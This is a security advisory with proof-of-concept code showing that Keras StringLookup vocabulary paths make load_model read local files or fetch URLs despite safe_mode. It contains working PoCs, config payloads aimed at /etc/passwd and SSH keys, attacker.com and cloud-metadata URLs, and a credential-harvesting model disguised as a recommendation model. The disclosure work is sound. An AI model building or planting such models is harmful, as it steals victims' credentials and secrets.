Load‑Time File & Network Access via StringLookup / IndexLookup Vocabulary Paths in Keras 3.11.3

Author: Jayashwa Singh Chauhan
Date: 25 Sep 2025
Tested version: keras==3.11.3 (TensorFlow backend 2.20.0)
Status: Reproduced with multiple PoCs (A/B/C). Works with safe_mode=True.
Class: Deserialization side‑effect → Arbitrary File Read (LFI) and potential SSRF

Executive Summary

Keras allows StringLookup (implemented atop IndexLookup) to accept a file path (or URL‑like path) in its vocabulary argument. When such a model is loaded, Keras invokes TensorFlow's tf.io.gfile APIs to check and open the referenced path during deserialization—even with safe_mode=True and no custom_objects. As a result:

A malicious .keras file can cause arbitrary local files (e.g., /etc/passwd, SSH keys) to be read at model load time and incorporated into the model state (retrievable via get_vocabulary() or by re‑saving the model).
On builds where tf.io.gfile has HTTP/remote filesystem handlers enabled (e.g., via TensorFlow‑IO), the same vector can fetch from attacker‑controlled or internal endpoints (SSRF).

This behavior bypasses safe‑mode expectations and turns loading an untrusted model into a confidentiality risk, and in some environments a network exfiltration vector.

Key facts backed by upstream docs:

StringLookup(vocabulary=...) accepts a string path to a text file. ([Keras][1])
The Keras v3 .keras format is a zip that contains config.json, model.weights.h5, and metadata.json. ([Keras][2])
keras.saving.load_model(..., safe_mode=True) is the default, intended to block unsafe lambda deserialization. ([Keras][3])
tf.io.gfile provides a filesystem‑abstracted API (local files, and—when supported/build‑enabled—GCS/HDFS/others; additional schemes often come from TensorFlow‑IO). ([TensorFlow][4])

Affected Components & Versions

Keras layers: keras.layers.StringLookup (backed by IndexLookup); likely also IntegerLookup (same pattern accepts vocabularies), though our PoCs focused on strings. (IntegerLookup's public docs also permit supplying vocabulary at construction.) ([Keras][5])
Keras versions: Confirmed on 3.11.3 with TF 2.20.0. Older 3.x are very likely affected since the behavior stems from the vocabulary path design.
Backends: Path resolution uses TensorFlow's tf.io.gfile (the layer itself is TF‑bound per docs), so the issue manifests on TF backend loads; behavior on non‑TF backends depends on whether TF is still imported for this layer during deserialization. ([Keras][1])
Environments: HTTP/remote schemes require builds with the corresponding filesystem plugins (often via tensorflow‑io); otherwise you'll still observe network probes (e.g., exists checks) but actual fetch may raise "scheme not implemented." ([GitHub][6])

Threat Model

Attacker capability: Can share a crafted .keras model (email, Git repo, model hub, internal share).
Victim action: Loads the model in Python using keras.saving.load_model("model.keras") with defaults (safe_mode=True, compile=True|False).
No custom code required: No lambdas or custom_objects needed.
Effect at load time: File/URL is probed and may be opened/read; tokens appear in layer vocabulary immediately; if the model is re‑saved, the tokens can be embedded in the artifact.

Reproduction (PoCs)

All PoCs were executed on Ubuntu with:

Python 3.10.12
keras 3.11.3
tensorflow 2.20.0
tensorflow‑io present in some runs (for http:// support)

PoC A — Content embedding via file path

Goal: Passing a file path to StringLookup(vocabulary=...) reads the file; sentinel tokens appear in the vocabulary after load_model(..., safe_mode=True).

# PoC A (minimal)
import os, keras
from keras import layers, Model

path = "/tmp/vocab.txt"
open(path,"w").write("alpha\nbeta\nSECRET_TOKEN_123\ngamma\n")

inp = layers.Input(shape=(1,), dtype="string")
lk = layers.StringLookup(vocabulary=path, name="sl")
model = Model(inp, lk(inp))
model.save("/tmp/pocA.keras")

loaded = keras.saving.load_model("/tmp/pocA.keras", safe_mode=True, compile=False)
print("VOCAB:", loaded.get_layer("sl").get_vocabulary())
# -> contains SECRET_TOKEN_123

Observed: SECRET_TOKEN_123 appears in get_vocabulary() immediately after load.

PoC B — Load‑time file access (tracing `tf.io.gfile`)

Goal: Confirm file is accessed during deserialization (not lazily later).

# PoC B (trace load-time access)
import keras
from keras.utils.module_utils import tensorflow as tf

orig_exists, orig_gfile = tf.io.gfile.exists, tf.io.gfile.GFile
def traced_exists(p): print("[TRACE exists]", p); return orig_exists(p)
def traced_open(p,*a,**kw): print("[TRACE open]", p); return orig_gfile(p,*a,**kw)
tf.io.gfile.exists, tf.io.gfile.GFile = traced_exists, traced_open

loaded = keras.saving.load_model("/tmp/pocA.keras", safe_mode=True, compile=False)
# Output includes probing/opening of the vocabulary file path during load

Observed sample output:

[TRACE exists] /home/ubuntu/Research/jay.txt
[+] PASS: Load-time file access confirmed for the target vocabulary file.

PoC C — URL vectors (`file://` and `http://`)

Goal: Show the same mechanism dereferences URL‑style paths.

Method: Save a benign .keras, then edit config.json inside the ZIP to set StringLookup.config.vocabulary to a URL; trace load.

# Start a local server in another terminal:
#   cd ~/Research && echo -e "one\nNET_TEST_TOKEN_456\nthree" > vocab_http.txt
#   python3 -m http.server 8000

import json, zipfile, keras
from keras.utils.module_utils import tensorflow as tf

src, dst = "/tmp/pocA.keras", "/tmp/pocC_http.keras"
url = "http://127.0.0.1:8000/vocab_http.txt"

with zipfile.ZipFile(src,"r") as zin:
    data = {n: zin.read(n) for n in zin.namelist()}
cfg = json.loads(data["config.json"])
def patch(o):
    if isinstance(o, dict):
        if o.get("class_name","").endswith("StringLookup"):
            o["config"]["vocabulary"] = url
        [patch(v) for v in o.values()]
    elif isinstance(o, list):
        [patch(v) for v in o]
patch(cfg)
data["config.json"] = json.dumps(cfg).encode()

with zipfile.ZipFile(dst,"w") as zout:
    for n,b in data.items(): zout.writestr(n,b)

# Trace like PoC B, then:
loaded = keras.saving.load_model(dst, safe_mode=True, compile=False)

Observed:

file:// → exists/open calls confirmed during load.
http:// →
- On builds with HTTP filesystem support: exists and open to the URL confirmed during load (network access at deserialization).
- On builds without HTTP FS: exists probe observed, followed by “scheme not implemented” exception — still evidence of network probing at load.

Affected Components: keras.layers.StringLookup, keras.layers.IntegerLookup (via IndexLookup base class)
Root Cause: Unconstrained file path evaluation in set_vocabulary() method
Attack Vector: Malicious .keras model files with external file paths in layer configuration
Bypass: Circumvents safe_mode=True protections

Technical Analysis

1. Vulnerable Code Locations

Primary Vulnerability: `/keras/src/layers/preprocessing/index_lookup.py`

Lines 384-396: The Core Vulnerability

def set_vocabulary(self, vocabulary, idf_weights=None):
    # ... [parameter validation] ...

    if isinstance(vocabulary, str):  # ← String path detected
        if not tf.io.gfile.exists(vocabulary):  # ← LINE 385: FILE ACCESS!
            raise ValueError(
                f"Vocabulary file {vocabulary} does not exist."
            )
        if self.output_mode == "tf_idf":
            raise ValueError(
                "output_mode `'tf_idf'` does not support loading a "
                "vocabulary from file."
            )
        self.lookup_table = self._lookup_table_from_file(vocabulary)  # ← LINE 394: FILE READ!
        self._record_vocabulary_size()
        return

Lines 863-879: File Reading Implementation

def _lookup_table_from_file(self, filename):
    if self.invert:
        key_index = tf.lookup.TextFileIndex.LINE_NUMBER
        value_index = tf.lookup.TextFileIndex.WHOLE_LINE
    else:
        key_index = tf.lookup.TextFileIndex.WHOLE_LINE
        value_index = tf.lookup.TextFileIndex.LINE_NUMBER
    with tf.init_scope():
        initializer = tf.lookup.TextFileInitializer(  # ← FILE READ OPERATION
            filename=filename,  # ← ATTACKER-CONTROLLED PATH
            key_dtype=self._key_dtype,
            key_index=key_index,
            value_dtype=self._value_dtype,
            value_index=value_index,
            value_index_offset=self._token_start_index(),
        )
        return tf.lookup.StaticHashTable(initializer, self._default_value)

2. Execution Flow Analysis

Step 1: Model Loading Entry Point

File: /keras/src/saving/saving_api.py

def load_model(filepath, custom_objects=None, compile=True, safe_mode=None):
    # safe_mode defaults to True
    return saving_lib.load_model(
        filepath, custom_objects, compile, safe_mode=safe_mode
    )

Step 2: Archive Processing

File: /keras/src/saving/saving_lib.py:437-444

def _load_model_from_fileobj(fileobj, custom_objects, compile, safe_mode):
    with zipfile.ZipFile(fileobj, "r") as zf:
        with zf.open(_CONFIG_FILENAME, "r") as f:  # ← Read config.json
            config_json = f.read()

        model = _model_from_config(  # ← Parse and reconstruct model
            config_json, custom_objects, compile, safe_mode
        )

Step 3: Model Deserialization

File: /keras/src/saving/saving_lib.py:430-434

def _model_from_config(config_json, custom_objects, compile, safe_mode):
    config_dict = json.loads(config_json)

    with ObjectSharingScope():
        model = deserialize_keras_object(  # ← Deserialize layers
            config_dict, custom_objects, safe_mode=safe_mode
        )
    return model

Step 4: Layer Reconstruction

File: /keras/src/saving/serialization_lib.py

def deserialize_keras_object(config, custom_objects=None, safe_mode=None, **kwargs):
    # ... [class resolution] ...

    # For StringLookup layers:
    cls = _retrieve_class_or_fn(...)  # ← Gets StringLookup class

    # Calls StringLookup.from_config() or __init__()
    instance = cls.from_config(inner_config, custom_objects=custom_objects)

Step 5: StringLookup Initialization

File: /keras/src/layers/preprocessing/string_lookup.py:321-335

def __init__(self, max_tokens=None, ..., vocabulary=None, ...):
    # ...
    super().__init__(  # ← Calls IndexLookup.__init__()
        # ...
        vocabulary=vocabulary,  # ← ATTACKER-CONTROLLED PATH
        # ...
    )

Step 6: IndexLookup Initialization Triggers Vulnerability

File: /keras/src/layers/preprocessing/index_lookup.py

def __init__(self, ..., vocabulary=None, ...):
    # ... [setup] ...

    if vocabulary is not None:
        self.set_vocabulary(vocabulary, idf_weights)  # ← TRIGGERS FILE ACCESS

Step 7: File Access Execution

The set_vocabulary() method (lines 384-396) immediately:

Checks if vocabulary is a string (attacker-controlled)
Calls tf.io.gfile.exists(vocabulary) - FIRST FILE ACCESS
Calls self._lookup_table_from_file(vocabulary) - SECOND FILE ACCESS
_lookup_table_from_file() uses tf.lookup.TextFileInitializer(filename=vocabulary) - ACTUAL FILE READ

3. Attack Vector Details

3.1. Configuration Injection

The vulnerability is triggered through malicious .keras archive contents:

config.json Structure:

{
  "layers": [
    {
      "class_name": "StringLookup",
      "config": {
        "name": "malicious_lookup",
        "vocabulary": "/etc/passwd",  ← ATTACKER INJECTION POINT
        "max_tokens": null,
        "num_oov_indices": 1,
        // ... other configs
      }
    }
  ]
}

3.2. TensorFlow File API Abuse

The vulnerability leverages TensorFlow's tf.io.gfile API which supports:

Local paths: /etc/passwd, C:\Windows\System32\drivers\etc\hosts
File URLs: file:///etc/passwd
Network URLs: http://attacker.com/steal, gs://bucket/file (if tensorflow-io installed)
Cloud metadata: http://169.254.169.254/latest/meta-data/

3.3. Safe Mode Bypass Analysis

The vulnerability bypasses safe_mode=True because:

Safe mode scope: Only blocks lambda deserialization in serialization_lib.py:656-666
Built-in layer assumption: StringLookup is a "trusted" built-in layer
File I/O not restricted: No validation of file paths in safe mode
Design gap: Safe mode focuses on code execution, not I/O operations

Threat Scenario: Malicious .keras Model on Hugging Face

Let's say you're an attacker. You create a malicious .keras model that abuses the vocabulary mechanism we discovered. Then you upload it to Hugging Face Hub (or any model-sharing platform).

Here's how the end-to-end flow unfolds

1. Attacker Creates a Malicious Model

The attacker builds a model with a StringLookup layer like:

lookup = layers.StringLookup(vocabulary="/etc/passwd")

or

lookup = layers.StringLookup(vocabulary="http://attacker.com/collect.txt")

This is not code injection — it's a normal, valid Keras layer.

The malicious part is the vocabulary pointing to a sensitive file or a remote server.

The attacker saves the model:

model.save("malicious_model.keras")

This .keras file contains config.json that looks like:

{
  "class_name": "StringLookup",
  "config": {
    "vocabulary": "/etc/passwd",
    ...
  }
}

They upload malicious_model.keras to Hugging Face.

2. Victim Downloads and Loads the Model

A data scientist, ML engineer, or researcher downloads the model from Hugging Face:

from keras import saving
model = saving.load_model("malicious_model.keras", safe_mode=True)

They trust the model because:

It's from a public model hub.
It loads without needing custom_objects.
They used safe_mode=True (thinking it's secure).

3.Trigger: Deserialization Causes File/Network Access

Here's the critical moment:

As soon as load_model() runs, Keras starts reconstructing the layers based on config.json.
It sees vocabulary is a path or URL, and calls tf.io.gfile.exists() and GFile() on it — before any inference code runs.

This means:

If the vocabulary is /etc/passwd → the model reads your system file immediately.
If it's file:///home/ubuntu/.ssh/id_rsa → it attempts to read your SSH key.
If it's http://attacker.com/collect → your machine tries to fetch that URL, revealing your IP, environment, and possibly internal network routes.
If it's http://169.254.169.254/latest/meta-data/ (cloud metadata service) → it could steal AWS/GCP instance credentials.

All of this happens silently during model load — the user hasn't even called .predict() yet.

4. Data Can Be Embedded or Exfiltrated

Two outcomes are possible depending on how the malicious model is built:

Local File Stealing (LFI)

The file's contents are read and inserted into the layer's vocabulary.
Anyone who later calls:
```
vocab = model.get_layer("lookup").get_vocabulary()
```
…will see sensitive tokens (like lines from /etc/passwd) now embedded in the model.
If they re-save the model and upload it somewhere (e.g., retrained version), those sensitive tokens get exfiltrated.

Remote Callback (SSRF / Exfiltration)

If HTTP filesystem support is enabled (tensorflow-io or custom build), the model can make a network request to attacker infrastructure.
That request may include:
- Sensitive query parameters (if attacker encoded them)
- Internal network responses (if SSRF targets internal services)
- Metadata credentials (e.g., AWS/GCP metadata endpoints)

This is even more dangerous because:

It happens invisibly, during deserialization.
It does not require model inference or user code.
It bypasses safe_mode protections.

5. Downstream Impact on the End User

Scenario	Impact
Local machine	Sensitive files like SSH keys, API tokens, or OS user data may be embedded in the model
Cloud environment	Metadata tokens from AWS/GCP/OCI endpoints can be accessed — possible cloud account compromise
Corporate network	SSRF may let the attacker pivot into internal services, scan ports, or exfiltrate network topology
CI/CD systems	Pipeline secrets or build credentials could leak if the model is used during automated deployments
Model redistribution	Sensitive tokens embedded in the vocabulary may be unintentionally leaked if the model is re-shared

Realistic Example

Attacker uploads malicious_model.keras to Hugging Face.
Victim loads it in a Jupyter notebook with safe_mode=True.
During deserialization:
- /home/ubuntu/.ssh/id_rsa is read and added as a vocabulary token.
- OR http://169.254.169.254/latest/meta-data/ is contacted.
Victim trains further and re-uploads the model.
Attacker downloads it and calls .get_vocabulary() → now they have the victim's SSH key or metadata secrets.

Key Takeaways for End Users

Deserialization is not passive – loading a model can trigger file or network access before you execute any code.
Safe mode is insufficient – it blocks arbitrary bytecode, not dangerous file paths or URLs in built-in layers.
Public models should never be trusted blindly – loading them without sandboxing is equivalent to executing untrusted code.
Even non-malicious workflows can leak data – if vocabulary references are left pointing to sensitive files, that data becomes part of the model state.

Enterprise Threat Scenario: Insider Data Exfiltration

How the Attack Works (High-Level)

** Malicious Model Creation**: Insider builds a model that uses a lookup layer with vocabulary pointing at sensitive files:
- /home/service/.aws/credentials - Cloud access keys
- .npmrc - Package registry tokens
- ~/.kube/config - Kubernetes cluster access
- /etc/ssl/private/server.key - TLS private keys
- Application config files with database passwords
Publication: They save and publish the .keras file to an internal registry or model hub
Legitimate Loading: A pipeline or colleague loads the model (often with safe_mode=True, no custom objects)
** Automatic Exfiltration**: During deserialization, Keras resolves the vocabulary:
- Local path: Reads the file contents immediately
- URL (if TF build supports it): Attempts network fetch to attacker infrastructure
- File contents become part of model state (lookup vocabulary)
- Data Extraction**: The insider (or any attacker with access to the resulting .keras file) can later:
- Load the model and call get_vocabulary() on the lookup layer
- Inspect weights/assets in the archive to extract embedded secrets

Why This Is Impactful Even Without RCE

0-click data exposure at load time - no user interaction required
Secrets persist inside the artifact and leak later when model is re-shared, archived, or debugged
Bypasses code-review guardrails - rides on allowed, built-in layer behavior
Steganographic hiding - sensitive data hidden in legitimate ML artifacts
Supply chain contamination - malicious models can propagate through ML pipelines

Real-World Attack Examples

# Enterprise credential harvesting model
model = keras.Sequential([
    layers.Input(shape=(1,), dtype="string"),
    # Cloud credentials
    layers.StringLookup(vocabulary="/home/jenkins/.aws/credentials", name="aws"),
    layers.StringLookup(vocabulary="/home/jenkins/.azure/azureProfile.json", name="azure"),
    # Container orchestration
    layers.StringLookup(vocabulary="/home/jenkins/.kube/config", name="k8s"),
    # Package management
    layers.StringLookup(vocabulary="/home/jenkins/.npmrc", name="npm"),
    layers.StringLookup(vocabulary="/home/jenkins/.pypirc", name="pypi"),
    # Application secrets
    layers.StringLookup(vocabulary="/opt/app/config/database.yml", name="db"),
    # Normal model layers to maintain cover
    layers.Dense(64, activation="relu"),
    layers.Dense(1, activation="sigmoid")
])

model.save("recommendation_model_v3.keras")  # Appears legitimate

Evidence for Security Analysis

To demonstrate the full impact, security teams should document:

Load → Extract: Show load_model() → get_vocabulary() contains known sentinels from sensitive files
Persistence across saves: Re-save the loaded model and perform second extraction to show data persists
OS-level confirmation: Use strace or auditd to confirm file opens during load_model()
Network attempts: Show URL-based vocabulary triggers network requests (if TF build supports it)